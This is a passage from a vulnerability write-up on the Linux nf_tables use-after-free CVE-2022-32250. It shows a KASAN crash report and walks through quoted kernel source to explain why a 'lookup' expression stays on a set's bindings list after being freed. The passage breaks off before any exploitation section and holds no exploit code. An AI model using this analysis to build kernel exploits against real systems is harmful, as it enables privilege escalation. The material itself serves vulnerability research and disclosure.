The following is the KASAN report we saw. We decided to manually triage it. We constructed a minimal reproducible trigger and provided it in the initial public report, which can be found at the end of our original advisory here.

[ 85.431824] ==================================================================
[ 85.432901] BUG: KASAN: use-after-free in nf_tables_bind_set+0x81b/0xa20
[ 85.433825] Write of size 8 at addr ffff8880286f0e98 by task poc/776
[ 85.434756]
[ 85.434999] CPU: 1 PID: 776 Comm: poc Tainted: G W 5.18.0+ #2
[ 85.436023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[ 85.437228] Call Trace:
[ 85.437594] <TASK>
[ 85.437919] dump_stack_lvl+0x49/0x5f
[ 85.438470] print_report.cold+0x5e/0x5cf
[ 85.439073] ? __cpuidle_text_end+0x4/0x4
[ 85.439655] ? nf_tables_bind_set+0x81b/0xa20
[ 85.440286] kasan_report+0xaa/0x120
[ 85.440809] ? delay_halt_mwaitx+0x31/0x50
[ 85.441392] ? nf_tables_bind_set+0x81b/0xa20
[ 85.442022] __asan_report_store8_noabort+0x17/0x20
[ 85.442725] nf_tables_bind_set+0x81b/0xa20
[ 85.443338] ? nft_set_elem_expr_destroy+0x2a0/0x2a0
[ 85.444051] ? nla_strcmp+0xa8/0xe0
[ 85.444520] ? nft_set_lookup_global+0x88/0x360
[ 85.445157] nft_lookup_init+0x463/0x620
[ 85.445710] nft_expr_init+0x13a/0x2a0
[ 85.446242] ? nft_obj_del+0x210/0x210
[ 85.446778] ? __kasan_check_write+0x14/0x20
[ 85.447395] ? rhashtable_init+0x326/0x6d0
[ 85.447974] ? __rcu_read_unlock+0xde/0x100
[ 85.448565] ? nft_rhash_init+0x213/0x2f0
[ 85.449129] ? nft_rhash_gc_init+0xb0/0xb0
[ 85.449717] ? nf_tables_newset+0x1646/0x2e40
[ 85.450359] ? jhash+0x630/0x630
[ 85.450838] nft_set_elem_expr_alloc+0x24/0x210
[ 85.451507] nf_tables_newset+0x1b3f/0x2e40
[ 85.452124] ? rcu_preempt_deferred_qs_irqrestore+0x579/0xa70
[ 85.452948] ? nft_set_elem_expr_alloc+0x210/0x210
[ 85.453636] ? delay_tsc+0x94/0xc0
[ 85.454161] nfnetlink_rcv_batch+0xeb4/0x1fd0
[ 85.454808] ? nfnetlink_rcv_msg+0x980/0x980
[ 85.455444] ? stack_trace_save+0x94/0xc0
[ 85.456036] ? filter_irq_stacks+0x90/0x90
[ 85.456639] ? __const_udelay+0x62/0x80
[ 85.457206] ? _raw_spin_lock_irqsave+0x99/0xf0
[ 85.457864] ? nla_get_range_signed+0x350/0x350
[ 85.458528] ? security_capable+0x5f/0xa0
[ 85.459128] nfnetlink_rcv+0x2f0/0x3b0
[ 85.459669] ? nfnetlink_rcv_batch+0x1fd0/0x1fd0
[ 85.460327] ? rcu_read_unlock_special+0x52/0x3b0
[ 85.461000] netlink_unicast+0x5ec/0x890
[ 85.461563] ? netlink_attachskb+0x750/0x750
[ 85.462169] ? __kasan_check_read+0x11/0x20
[ 85.462766] ? __check_object_size+0x226/0x3a0
[ 85.463408] netlink_sendmsg+0x830/0xd10
[ 85.463968] ? netlink_unicast+0x890/0x890
[ 85.464552] ? apparmor_socket_sendmsg+0x3d/0x50
[ 85.465206] ? netlink_unicast+0x890/0x890
[ 85.465792] sock_sendmsg+0xec/0x120
[ 85.466303] __sys_sendto+0x1e2/0x2e0
[ 85.466821] ? __ia32_sys_getpeername+0xb0/0xb0
[ 85.467470] ? alloc_file_pseudo+0x184/0x270
[ 85.468070] ? perf_callchain_user+0x60/0xa60
[ 85.468683] ? preempt_count_add+0x7f/0x170
[ 85.469280] ? fd_install+0x14f/0x330
[ 85.469800] ? __sys_socket+0x166/0x200
[ 85.470342] ? __sys_socket_file+0x1c0/0x1c0
[ 85.470940] ? debug_smp_processor_id+0x17/0x20
[ 85.471583] ? fpregs_assert_state_consistent+0x4e/0xb0
[ 85.472308] __x64_sys_sendto+0xe0/0x1a0
[ 85.472854] ? do_syscall_64+0x69/0x80
[ 85.473379] do_syscall_64+0x5c/0x80
[ 85.473878] ? fpregs_restore_userregs+0xf3/0x200
[ 85.474532] ? switch_fpu_return+0xe/0x10
[ 85.475099] ? exit_to_user_mode_prepare+0x140/0x170
[ 85.475791] ? irqentry_exit_to_user_mode+0x9/0x20
[ 85.476465] ? irqentry_exit+0x33/0x40
[ 85.476991] ? exc_page_fault+0x72/0xe0
[ 85.477524] entry_SYSCALL_64_after_hwframe+0x46/0xb0
[ 85.478219] RIP: 0033:0x45c66a
[ 85.478648] Code: d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 f3 0f 1e fa 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 15 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 7e c3 0f 1f 44 00 00 41 54 48 83 ec 30 44 89
[ 85.481183] RSP: 002b:00007ffd091bfee8 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
[ 85.482214] RAX: ffffffffffffffda RBX: 0000000000000174 RCX: 000000000045c66a
[ 85.483190] RDX: 0000000000000174 RSI: 00007ffd091bfef0 RDI: 0000000000000003
[ 85.484162] RBP: 00007ffd091c23b0 R08: 00000000004a94c8 R09: 000000000000000c
[ 85.485128] R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffd091c1ef0
[ 85.486094] R13: 0000000000000004 R14: 0000000000002000 R15: 0000000000000000
[ 85.487076] </TASK>
[ 85.487388]
[ 85.487608] Allocated by task 776:
[ 85.488082] kasan_save_stack+0x26/0x50
[ 85.488614] __kasan_kmalloc+0x88/0xa0
[ 85.489131] __kmalloc+0x1b9/0x370
[ 85.489602] nft_expr_init+0xcd/0x2a0
[ 85.490109] nft_set_elem_expr_alloc+0x24/0x210
[ 85.490731] nf_tables_newset+0x1b3f/0x2e40
[ 85.491314] nfnetlink_rcv_batch+0xeb4/0x1fd0
[ 85.491912] nfnetlink_rcv+0x2f0/0x3b0
[ 85.492429] netlink_unicast+0x5ec/0x890
[ 85.492985] netlink_sendmsg+0x830/0xd10
[ 85.493528] sock_sendmsg+0xec/0x120
[ 85.494035] __sys_sendto+0x1e2/0x2e0
[ 85.494545] __x64_sys_sendto+0xe0/0x1a0
[ 85.495109] do_syscall_64+0x5c/0x80
[ 85.495630] entry_SYSCALL_64_after_hwframe+0x46/0xb0
[ 85.496292]
[ 85.496479] Freed by task 776:
[ 85.496846] kasan_save_stack+0x26/0x50
[ 85.497351] kasan_set_track+0x25/0x30
[ 85.497893] kasan_set_free_info+0x24/0x40
[ 85.498489] __kasan_slab_free+0x110/0x170
[ 85.499103] kfree+0xa7/0x310
[ 85.499548] nft_set_elem_expr_alloc+0x1b3/0x210
[ 85.500219] nf_tables_newset+0x1b3f/0x2e40
[ 85.500822] nfnetlink_rcv_batch+0xeb4/0x1fd0
[ 85.501449] nfnetlink_rcv+0x2f0/0x3b0
[ 85.501990] netlink_unicast+0x5ec/0x890
[ 85.502558] netlink_sendmsg+0x830/0xd10
[ 85.503133] sock_sendmsg+0xec/0x120
[ 85.503655] __sys_sendto+0x1e2/0x2e0
[ 85.504194] __x64_sys_sendto+0xe0/0x1a0
[ 85.504779] do_syscall_64+0x5c/0x80
[ 85.505330] entry_SYSCALL_64_after_hwframe+0x46/0xb0
[ 85.506095]
[ 85.506325] The buggy address belongs to the object at ffff8880286f0e80
[ 85.506325] which belongs to the cache kmalloc-cg-64 of size 64
[ 85.508152] The buggy address is located 24 bytes inside of
[ 85.508152] 64-byte region [ffff8880286f0e80, ffff8880286f0ec0)
[ 85.509845]
[ 85.510095] The buggy address belongs to the physical page:
[ 85.510962] page:000000008955c452 refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff8880286f0080 pfn:0x286f0
[ 85.512566] memcg:ffff888054617c01
[ 85.513079] flags: 0xffe00000000200(slab|node=0|zone=1|lastcpupid=0x3ff)
[ 85.514070] raw: 00ffe00000000200 0000000000000000 dead000000000122 ffff88801b842780
[ 85.515251] raw: ffff8880286f0080 000000008020001d 00000001ffffffff ffff888054617c01
[ 85.516421] page dumped because: kasan: bad access detected
[ 85.517264]
[ 85.517505] Memory state around the buggy address:
[ 85.518231] ffff8880286f0d80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 85.519321] ffff8880286f0e00: fa fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 85.520392] >ffff8880286f0e80: fa fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 85.521456] ^
[ 85.522050] ffff8880286f0f00: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
[ 85.523125] ffff8880286f0f80: fa fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 85.524200] ==================================================================
[ 85.525364] Disabling lock debugging due to kernel taint
[ 85.534106] ------------[ cut here ]------------
[ 85.534874] WARNING: CPU: 1 PID: 776 at net/netfilter/nf_tables_api.c:4592 nft_set_destroy+0x343/0x460
[ 85.536269] Modules linked in:
[ 85.536741] CPU: 1 PID: 776 Comm: poc Tainted: G B W 5.18.0+ #2
[ 85.537792] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[ 85.539080] RIP: 0010:nft_set_destroy+0x343/0x460
[ 85.539774] Code: 3c 02 00 0f 85 26 01 00 00 49 8b 7c 24 30 e8 94 f0 ee f1 4c 89 e7 e8 ec b0 da f1 48 83 c4 30 5b 41 5c 41 5d 41 5e 41 5f 5d c3 <0f> 0b 48 83 c4 30 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 8b 7d b0 e8
[ 85.542475] RSP: 0018:ffff88805911f4f8 EFLAGS: 00010202
[ 85.543282] RAX: 0000000000000002 RBX: dead000000000122 RCX: ffff88805911f508
[ 85.544291] RDX: 0000000000000000 RSI: ffff888052ab1800 RDI: ffff888052ab1864
[ 85.545331] RBP: ffff88805911f550 R08: ffff8880286ce908 R09: 0000000000000000
[ 85.546371] R10: ffffed100b223e56 R11: 0000000000000001 R12: ffff888052ab1800
[ 85.547447] R13: ffff8880286ce900 R14: dffffc0000000000 R15: ffff8880286ce780
[ 85.548487] FS: 00000000018293c0(0000) GS:ffff88806a900000(0000) knlGS:0000000000000000
[ 85.549630] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 85.550470] CR2: 00007ffd091bfee8 CR3: 0000000052156000 CR4: 00000000000006e0
[ 85.551551] Call Trace:
[ 85.551930] <TASK>
[ 85.552245] ? rcu_read_unlock_special+0x52/0x3b0
[ 85.552971] __nf_tables_abort+0xd40/0x2f10
[ 85.553612] ? __udelay+0x15/0x20
[ 85.554133] ? __nft_release_basechain+0x5a0/0x5a0
[ 85.554878] ? rcu_read_unlock_special+0x52/0x3b0
[ 85.555592] nf_tables_abort+0x77/0xa0
[ 85.556153] nfnetlink_rcv_batch+0xb23/0x1fd0
[ 85.556820] ? nfnetlink_rcv_msg+0x980/0x980
[ 85.557467] ? stack_trace_save+0x94/0xc0
[ 85.558065] ? filter_irq_stacks+0x90/0x90
[ 85.558682] ? __const_udelay+0x62/0x80
[ 85.559321] ? _raw_spin_lock_irqsave+0x99/0xf0
[ 85.559997] ? nla_get_range_signed+0x350/0x350
[ 85.560683] ? security_capable+0x5f/0xa0
[ 85.561307] nfnetlink_rcv+0x2f0/0x3b0
[ 85.561863] ? nfnetlink_rcv_batch+0x1fd0/0x1fd0
[ 85.562555] ? rcu_read_unlock_special+0x52/0x3b0
[ 85.563303] netlink_unicast+0x5ec/0x890
[ 85.563896] ? netlink_attachskb+0x750/0x750
[ 85.564546] ? __kasan_check_read+0x11/0x20
[ 85.565165] ? __check_object_size+0x226/0x3a0
[ 85.565838] netlink_sendmsg+0x830/0xd10
[ 85.566407] ? netlink_unicast+0x890/0x890
[ 85.567044] ? apparmor_socket_sendmsg+0x3d/0x50
[ 85.567724] ? netlink_unicast+0x890/0x890
[ 85.568334] sock_sendmsg+0xec/0x120
[ 85.568874] __sys_sendto+0x1e2/0x2e0
[ 85.569417] ? __ia32_sys_getpeername+0xb0/0xb0
[ 85.570086] ? alloc_file_pseudo+0x184/0x270
[ 85.570757] ? perf_callchain_user+0x60/0xa60
[ 85.571431] ? preempt_count_add+0x7f/0x170
[ 85.572054] ? fd_install+0x14f/0x330
[ 85.572612] ? __sys_socket+0x166/0x200
[ 85.573190] ? __sys_socket_file+0x1c0/0x1c0
[ 85.573805] ? debug_smp_processor_id+0x17/0x20
[ 85.574452] ? fpregs_assert_state_consistent+0x4e/0xb0
[ 85.575242] __x64_sys_sendto+0xe0/0x1a0
[ 85.575804] ? do_syscall_64+0x69/0x80
[ 85.576367] do_syscall_64+0x5c/0x80
[ 85.576901] ? fpregs_restore_userregs+0xf3/0x200
[ 85.577591] ? switch_fpu_return+0xe/0x10
[ 85.578179] ? exit_to_user_mode_prepare+0x140/0x170
[ 85.578947] ? irqentry_exit_to_user_mode+0x9/0x20
[ 85.579676] ? irqentry_exit+0x33/0x40
[ 85.580245] ? exc_page_fault+0x72/0xe0
[ 85.580824] entry_SYSCALL_64_after_hwframe+0x46/0xb0
[ 85.581577] RIP: 0033:0x45c66a
[ 85.582059] Code: d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 f3 0f 1e fa 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 15 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 7e c3 0f 1f 44 00 00 41 54 48 83 ec 30 44 89
[ 85.584728] RSP: 002b:00007ffd091bfee8 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
[ 85.585784] RAX: ffffffffffffffda RBX: 0000000000000174 RCX: 000000000045c66a
[ 85.586821] RDX: 0000000000000174 RSI: 00007ffd091bfef0 RDI: 0000000000000003
[ 85.587835] RBP: 00007ffd091c23b0 R08: 00000000004a94c8 R09: 000000000000000c
[ 85.588832] R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffd091c1ef0
[ 85.589820] R13: 0000000000000004 R14: 0000000000002000 R15: 0000000000000000
[ 85.590899] </TASK>
[ 85.591243] ---[ end trace 0000000000000000 ]---

The few simplified points to note from the dump are:

We see the UAF happens when an expression is being bound to a set. It seems to be initializing a “lookup” expression specifically, which seems to perhaps be an expression specific to this set.

nf_tables_bind_set+0x81b/0xa20
nft_lookup_init+0x463/0x620
nft_expr_init+0x13a/0x2a0
nft_set_elem_expr_alloc+0x24/0x210
nf_tables_newset+0x1b3f/0x2e40

The object being used after free was allocated when constructing a new set:

nft_expr_init+0xcd/0x2a0
nft_set_elem_expr_alloc+0x24/0x210
nf_tables_newset+0x1b3f/0x2e40

Its interesting to note that the code path used for the allocation seems very similar to where the UAF is occurring.

And finally when the free occured:

kfree+0xa7/0x310
nft_set_elem_expr_alloc+0x1b3/0x210
nf_tables_newset+0x1b3f/0x2e40

Also the free looks in close proximity to when the use-after-free happens.

As an additional point of interest @dvyukov on twitter noticed after we had made the vulnerability report public that this issue had been found by syzbot in November 2021, but maybe because no reproducer was created and a lack of activity, it was never investigated and properly triaged and finally it was automatically closed as invalid.

CVE-2022-32250 Analysis

With a bit of background on netlink and nf_tables out of the way we can take a look at the vulnerability and try to understand what is happening. Our vulnerability is related to the handling of expressions that are bound to a set. If you already read the original bug report, then you may be able to skip this part (as much of the content is duplicated) and jump straight into the “Exploitation” section.

Set Creation

The vulnerability is due to a failure to properly clean up when a “lookup” or “dynset” expression is encountered when creating a set using NFT_MSG_NEWSET. The nf_tables_newset() function is responsible for handling the NFT_MSG_NEWSET netlink message. Let’s first look at this function.

From nf_tables_api.c:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4189
static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
                const struct nlattr * const nla[])
{
    const struct nfgenmsg *nfmsg = nlmsg_data(info->nlh);
    u32 ktype, dtype, flags, policy, gc_int, objtype;
    struct netlink_ext_ack *extack = info->extack;
    u8 genmask = nft_genmask_next(info->net);
    int family = nfmsg->nfgen_family;
    const struct nft_set_ops *ops;
    struct nft_expr *expr = NULL;
    struct net *net = info->net;
    struct nft_set_desc desc;
    struct nft_table *table;
    unsigned char *udata;
    struct nft_set *set;
    struct nft_ctx ctx;
    size_t alloc_size;
    u64 timeout;
    char *name;
    int err, i;
    u16 udlen;
    u64 size;

[1] if (nla[NFTA_SET_TABLE] == NULL ||
        nla[NFTA_SET_NAME] == NULL ||
        nla[NFTA_SET_KEY_LEN] == NULL ||
        nla[NFTA_SET_ID] == NULL)
        return -EINVAL;

When creating a set we need to specify an associated table, as well as providing a set name, key len, and id shown above at [1]. Assuming all the basic prerequisites are matched, this function will allocate a nft_set structure to track the newly created set:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4354
    set = kvzalloc(alloc_size, GFP_KERNEL);
    if (!set)
        return -ENOMEM;

[...]

[2] INIT_LIST_HEAD(&set->bindings);
    INIT_LIST_HEAD(&set->catchall_list);
    set->table = table;
    write_pnet(&set->net, net);
    set->ops = ops;
    set->ktype = ktype;
    set->klen = desc.klen;
    set->dtype = dtype;
    set->objtype = objtype;
    set->dlen = desc.dlen;
    set->flags = flags;
    set->size = desc.size;
    set->policy = policy;
    set->udlen = udlen;
    set->udata = udata;
    set->timeout = timeout;
    set->gc_int = gc_int;

We can see above at [2] that it initializes the set->bindings list, which will be interesting later.

After initialization is complete, the function will test whether or not there are any expressions associated with the set:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4401
    if (nla[NFTA_SET_EXPR]) {
[3]     expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]);
        if (IS_ERR(expr)) {
            err = PTR_ERR(expr);
[4]         goto err_set_expr_alloc;
        }
        set->exprs[0] = expr;
        set->num_exprs++;
    } else if (nla[NFTA_SET_EXPRESSIONS]) {
        [...]
    }

We can see above if NFTA_SET_EXPR is found, then a call will be made to nft_set_elem_expr_alloc() at [3], to handle whatever the expression type is. If the allocation of the expression fails, then it will jump to a label responsible for destroying the set at [4].

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4448
err_set_expr_alloc:
    for (i = 0; i < set->num_exprs; i++)
[5]     nft_expr_destroy(&ctx, set->exprs[i]);

    ops->destroy(set);
err_set_init:
    kfree(set->name);
err_set_name:
    kvfree(set);
    return err;
}

We see above that even if only one expression fails to initialize, all the associated expressions will be destroyed with nft_expr_destroy() at [5]. However, note that in the err_set_expr_alloc case above, the expression that failed initialization will not have been added to the set->expr array, so will not be destroyed here. It will have already been destroyed earlier inside of nft_set_elem_expr_alloc(), which we will see in a second.

The set element expression allocation function nft_set_elem_expr_alloc() is quite simple:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L5304
struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                     const struct nft_set *set,
                     const struct nlattr *attr)
{
    struct nft_expr *expr;
    int err;

[6] expr = nft_expr_init(ctx, attr);
    if (IS_ERR(expr))
        return expr;

    err = -EOPNOTSUPP;
[7] if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
        goto err_set_elem_expr;

    if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;
        if (!set->ops->gc_init)
            goto err_set_elem_expr;
        set->ops->gc_init(set);
    }

    return expr;

err_set_elem_expr:
[8] nft_expr_destroy(ctx, expr);
    return ERR_PTR(err);
}

The function will first initialize an expression at [6], and then only afterwards will it check whether that expression type is actually of an acceptable type to be associated with the set, namely NFT_EXPR_STATEFUL at [7].

This backwards order of state checking allows for the initialization of an arbitrary expression type that may not be able to be used with a set. This in turn means that anything that might be initialized at [6] that doesn’t get destroyed properly in this context could be left lingering. As noted earlier, there are only actually a handful (4) NFT_EXPR_STATEFUL compatible expressions, but this lets us first initialize any of these expressions.

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L2814
void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
[9] nf_tables_expr_destroy(ctx, expr);
    kfree(expr);
}

We see above that the destruction routine at [8] will call the destruction function associated with the expression via nf_tables_expr_destroy at [9], and then free the expression.

You would think that because nft_set_elem_expr_alloc calls nft_exprs_destroy at [8], there should be nothing left lingering, and actually the ability to initialize a non-stateful expression is not a vulnerability in and of itself, but we’ll see very soon it is partially this behavior that does allow vulnerabilities to more easily occur.

Now that we understand things up to this point, we will change focus to see what happens when we initialize a specific type of expression.

We know from the KASAN report that the crash was related to the nft_lookup expression type, so we take a look at the initialization routine there to see what’s up.

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L64
static int nft_lookup_init(const struct nft_ctx *ctx,
               const struct nft_expr *expr,
               const struct nlattr * const tb[])
{
[10]struct nft_lookup *priv = nft_expr_priv(expr);
    u8 genmask = nft_genmask_next(ctx->net);

We see that a nft_lookup structure is associated with this expression type at [10], which looks like the following:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L18
struct nft_lookup {
    struct nft_set * set;
    u8 sreg;
    u8 dreg;
    bool invert;
    struct nft_set_binding binding;
};

The struct nft_set_binding type (for the binding member) is defined as follows:

//https://elixir.bootlin.com/linux/v5.13/source/include/net/netfilter/nf_tables.h#L545
/**
 * struct nft_set_binding - nf_tables set binding
 *
 * @list: set bindings list node
 * @chain: chain containing the rule bound to the set
 * @flags: set action flags
 *
 * A set binding contains all information necessary for validation
 * of new elements added to a bound set.
 */
struct nft_set_binding {
    struct list_head list;
    const struct nft_chain * chain;
    u32 flags;
};

After assigning the lookup structure pointer at [10], the nft_lookup_init() function continues with:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L74
    struct nft_set *set;
    u32 flags;
    int err;

[11]if (tb[NFTA_LOOKUP_SET] == NULL ||
        tb[NFTA_LOOKUP_SREG] == NULL)
        return -EINVAL;

    set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
                    tb[NFTA_LOOKUP_SET_ID], genmask);
    if (IS_ERR(set))
        return PTR_ERR(set);

The start of the nft_lookup_init() function above tells us that we need to build a “lookup” expression with a set name to query (NFTA_LOOKUP_SET), as well as a source register (NFTA_LOOKUP_SREG). Then, it will look up a set using the name we specified, which means that the looked up set must already exist.

To be clear, since we’re in the process of creating a set with this “lookup” expression inside of it, we can’t actually look up that set as it is technically not associated with a table yet. It has to be a separate set that we already created earlier.

Assuming the looked up set was found, nft_lookup_init() will continue to handle various other arguments, which we don’t have to provide.

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L115
    [...]

    priv->binding.flags = set->flags & NFT_SET_MAP;

[12]err = nf_tables_bind_set(ctx, set, &priv->binding);
    if (err < 0)
        return err;

    priv->set = set;
    return 0;
}

At [12], we see a call to nf_tables_bind_set(), passing in the looked up set, as well as the address of the binding member of the nft_lookup structure.

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4589
int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
               struct nft_set_binding *binding)
{
    struct nft_set_binding *i;
    struct nft_set_iter iter;

    if (set->use == UINT_MAX)
        return -EOVERFLOW;
[...]
[13]if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
        return -EBUSY;

We control the flags for the set that we’re looking up, so we can make sure that it is not anonymous (just don’t specify the NFT_SET_ANONYMOUS flag during creation) and skip over [13].

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4601
    if (binding->flags & NFT_SET_MAP) {
        /* If the set is already bound to the same chain all
         * jumps are already validated for that chain.
         */
[...]
    }
bind:
    binding->chain = ctx->chain;
[14]list_add_tail_rcu(&binding->list, &set->bindings);
    nft_set_trans_bind(ctx, set);
[15]set->use++;

    return 0;
}

Assuming a few other checks all pass, the “lookup” expression is then bound to the bindings list of the set with list_add_tail_rcu() at [14]. This puts the nft_lookup structure onto this bindings list. This makes sense since the expression is associated with the set, so we would expect it to be added to some list.

A diagram of normal set binding when two expressions have been added to the bindings list is as follows:

The slab cache in which the expression is allocated varies depending on the expression type.

Tables can also have multiple sets attached. Visually this looks as follows:

Note also that getting our expression onto the sets bindings list increments the set->use ref counter as shown in [15] and mentioned earlier. This will prevent the destruction of the set until the use count is decremented.

Now we have an initialized nft_lookup structure that is bound to a previously created set, and we know that back in nft_set_elem_expr_alloc() it is going to be destroyed immediately because it does not have the NFT_EXPR_STATEFUL flag. Let’s take a look at nft_set_elem_expr_alloc() again:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L5304
struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                     const struct nft_set *set,
                     const struct nlattr *attr)
{
    struct nft_expr *expr;
    int err;

[16]expr = nft_expr_init(ctx, attr); 
    if (IS_ERR(expr))
        return expr;

    err = -EOPNOTSUPP;
    if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL))
        goto err_set_elem_expr;

    if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;
        if (!set->ops->gc_init)
            goto err_set_elem_expr;
        set->ops->gc_init(set);
    }

    return expr;

err_set_elem_expr: 
[17]nft_expr_destroy(ctx, expr);
    return ERR_PTR(err);
}

Above at [16] the expr variable will point to the nft_lookup structure that was just added to the set->bindings list, and that expression type does not have the NFT_EXPR_STATEFUL flag, so we immediately hit [17].

Just a side note that to confirm that there is no stateful flag we can see where the nft_lookup expression’s nft_expr_type structure is defined and check the flags:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L237
struct nft_expr_type nft_lookup_type __read_mostly = {
    .name = "lookup",
    .ops = &nft_lookup_ops,
    .policy = nft_lookup_policy,
    .maxattr = NFTA_LOOKUP_MAX,
    .owner = THIS_MODULE,
};

The .flags is not explicitly initialized, which means it will be unset (aka zeroed) and thus not contain NFT_EXPR_STATEFUL. An expression type declaring the flag would look something like this:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_limit.c#L230
static struct nft_expr_type nft_limit_type __read_mostly = {
    .name = "limit",
    .select_ops = nft_limit_select_ops,
    .policy = nft_limit_policy,
    .maxattr = NFTA_LIMIT_MAX,
    .flags = NFT_EXPR_STATEFUL,
    .owner = THIS_MODULE,
};

Next, we need to look at the nft_expr_destroy() function to see why the set->bindings entry doesn’t get cleared, as implied by the KASAN report.

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L2814
void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
    nf_tables_expr_destroy(ctx, expr); [17]
    kfree(expr);
}

As we saw earlier, a destroy routine is called at [17] before freeing the nft_lookup object, so the list removal will have to presumably exist there.

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L2752
static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
                   struct nft_expr *expr)
{
    const struct nft_expr_type *type = expr->ops->type;

    if (expr->ops->destroy)
[18]    expr->ops->destroy(ctx, expr); 
    module_put(type->owner);
}

This in turn leads us to the actual “lookup” expression’s destroy routine being called at [18].

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L232
static const struct nft_expr_ops nft_lookup_ops = {
    [...]
[19].destroy = nft_lookup_destroy,

In the case of nft_lookup, this points us to nft_lookup_destroy as seen in [19]:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L142
static void nft_lookup_destroy(const struct nft_ctx *ctx,
                   const struct nft_expr *expr)
{
    struct nft_lookup *priv = nft_expr_priv(expr);

[20]nf_tables_destroy_set(ctx, priv->set);
}

That function is very simple and only calls the routine to destroy the associated set at [20], so let’s take a look at it.

void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
[21]if (list_empty(&set->bindings) && nft_set_is_anonymous(set))
        nft_set_destroy(ctx, set); 
}

Finally, we see at [21] that the function is actually not going to do anything because set->bindings list is not empty, because the “lookup” expression was just bound to it and never removed. One confusing thing here is that there is no logic for removing the lookup from the set->bindings list at all, which seems to be the real problem.

Set Deactivation

Let’s take a look where the normal removal would occur to understand how this might be fixed.

If we look for the removal of the entry from the bindings list, specifically by looking for references to priv->binding we can see that the removal seems to correspond to the deactivation of the set through the lookup functions:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L231
static const struct nft_expr_ops nft_lookup_ops = {
    [...]
.deactivate = nft_lookup_deactivate,

and

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nft_lookup.c#L125
static void nft_lookup_deactivate(const struct nft_ctx *ctx,
                  const struct nft_expr *expr,
                  enum nft_trans_phase phase)
{
    struct nft_lookup *priv = nft_expr_priv(expr);

[22]nf_tables_deactivate_set(ctx, priv->set, &priv->binding, phase); 
}

This function just passes the entry on the binding list to the set deactivation routine at [22], which looks like this:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4647
void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
                  struct nft_set_binding *binding,
                  enum nft_trans_phase phase)
{
    switch (phase) {
    case NFT_TRANS_PREPARE:
        set->use--;
        return;
    case NFT_TRANS_ABORT:
    case NFT_TRANS_RELEASE:
        set->use--;
        fallthrough;
    default:
[23]    nf_tables_unbind_set(ctx, set, binding,
                     phase == NFT_TRANS_COMMIT);
    }
}

and this calls at [23]:

//https://elixir.bootlin.com/linux/v5.13/source/net/netfilter/nf_tables_api.c#L4634
static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
